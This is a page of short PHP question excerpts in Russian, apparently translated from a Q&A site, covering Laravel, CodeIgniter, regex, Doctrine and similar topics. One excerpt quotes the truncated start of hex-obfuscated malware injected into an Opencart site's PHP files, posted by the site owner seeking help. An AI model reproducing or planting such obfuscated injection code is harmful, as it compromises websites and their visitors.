php — вопросы с ответами

2 ответа
Я получаю сообщения об ошибках в файле laravel.log, но описание ошибки не помогает мне найти проблему. Я хочу зарегистрировать дополнительные данные, чтобы быть конкретными, request URL request data, во всех сообщениях об ошибках в файле журнала. Как я могу добавить эти две вещи? [2015-11-09 13:30:...
laravel-5.1
12 нояб. 2015, в 09:18
1 ответ
Я делаю все возможное, чтобы убедиться, что код работает совершенно неожиданно после того, как я загрузил его в другие формы, которые у меня есть, хорошо работают, кроме этого, где я хочу загрузить данные в базу данных, загружать ли пользователь изображение или нет данных должен быть в состоянии бы...
codeigniter
12 нояб. 2015, в 07:47
3 ответа
В CodeIgniter как добавить строку в поля? $this->db->where('acctg_store_id',$data['acc_store_id']); $this->db->set('dscr',dscr . $data['desc']); $this->db->set('stat',$data['val_selected']); $this->db->update('acctg_store',$db) $this->db->where('acctg_stor...
codeigniter
12 нояб. 2015, в 07:46
1 ответ
Извините, если этот вопрос сформулирован неправильно или не имеет никакого смысла. То, что я пытаюсь сделать, это написать оператор if, который проверяет: array(6) { [5]=> string(17) "Quality Assurance" [6]=> string(7) "Analyst" [7]=> string(19) "Developer/Front end...
arrays
12 нояб. 2015, в 06:36
3 ответа
Все файлы php моего Opencart 1.5.6.4, включая файлы php темы, имеют этот код поверх него: <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\...
opencart
malware
12 нояб. 2015, в 06:25
1 ответ
Я пытаюсь вытащить эти данные в PHP, в конечном счете, перейду в Javascript, чтобы я мог сделать некоторые графики. Когда я загружаю данные с помощью cURL с моего терминала mac, я открываю его в xCode и выглядит точно так, как ожидалось. Нет проблем с доступом к веб-сайту для данных: curl "http://...
12 нояб. 2015, в 05:08
1 ответ
Я подозреваю, что это простая проблема с объектами, не обновляющимися в памяти. Вот мои функции репозитория: public function insertTask($information) { ... $entityManager = $this->getEntityManager(); $entityManager->persist($taskObj); $entityManager->flush...
doctrine2
12 нояб. 2015, в 05:03
1 ответ
Я разместил сайт в Godaddy и доступен через https и http. Я объявил BASE_PATH var глобально на моем conf.php как: define('BASE_URL','//theventuregame.com'); И я использую этот BASE_URL var почти везде на моем сайте.. проблема в том, что люди посещают его, используя http://theventuregame.com или h...
path
12 нояб. 2015, в 04:15
2 ответа
Мне нужно захватить все между "одним" и "четырем", а "четыре" - необязательными. Мы не знаем, что между "одним" и "четвертым". Я попробовал сопоставить его, но не получаю правильный результат. Что я делаю не так? $text = "one two three four five six seven eight nine ten"; preg_match("~one( .+)(four...
preg-match
12 нояб. 2015, в 03:27
1 ответ
Я полный новичок и просто хочу знать, есть ли простое прохождение этих мест в карты Google, которые находятся в скрипте в моем HTML. Я могу получить координаты так, как это PHP (это работает): <?php require_once "sql.php"; error_reporting(E_ALL ^ E_NOTICE); ini_set('display_errors','On'); ...
google-maps
29 апр. 2014, в 22:28
1 ответ
Я получаю сообщение об ошибке при запросе этого оператора select. $comments = dbgetvar("SELECT SUM(CASE WHEN c.approve = '1' AND c.spam = '0' THEN 1 ELSE 0 END) AS approved, SUM(CASE WHEN c.approve = '0' AND c.spam = '0' THEN 1 ELSE 0 END) AS pending, S...
19 сен. 2010, в 19:22
2 ответа
Я хочу реализовать список тегов, например, десятку тегов, используемых на веб-сайте. Есть ли какие-либо учебники или статьи, которые могут помочь мне создать это! Например: #topic (200 mentions) #topic (150 mentions) #topic (50 mentions) .... и т.д....
tags
cloud
19 сен. 2010, в 17:17
1 ответ
Я пытаюсь открыть файл для экспорта как excel. я могу видеть данные в firebug, но нет возможности предложить файл пользователю. что мне здесь не хватает? Я включил свой код, который обрабатывает запрос и т.д., и приветствовал бы ваши комментарии. большое спасибо header("Content-Type: application/for...
18 сен. 2010, в 13:34
2 ответа
Я закончил дизайн сайта для встреч, и теперь я должен создать базу данных. Но я не уверен, какой метод использовать. Я использую Apache, PHP и MySQL. У меня есть пользователи, у каждого пользователя есть входной и выходной почтовый ящик, и у каждого пользователя есть список друзей. Это основной сцен...
database-design
18 сен. 2010, в 11:49
1 ответ
У меня есть код в VB, который выглядит так: 'Server.Transfer(txtUser.Text + "_page.aspx") который принимает пользователей, прошедших проверку подлинности, на свою страницу. Например, если Джон войдет в систему, он перенесет его в john_page.aspx. Как я могу интегрировать это в PHP login script? Я п...
18 сен. 2010, в 09:45
Наверх
Меню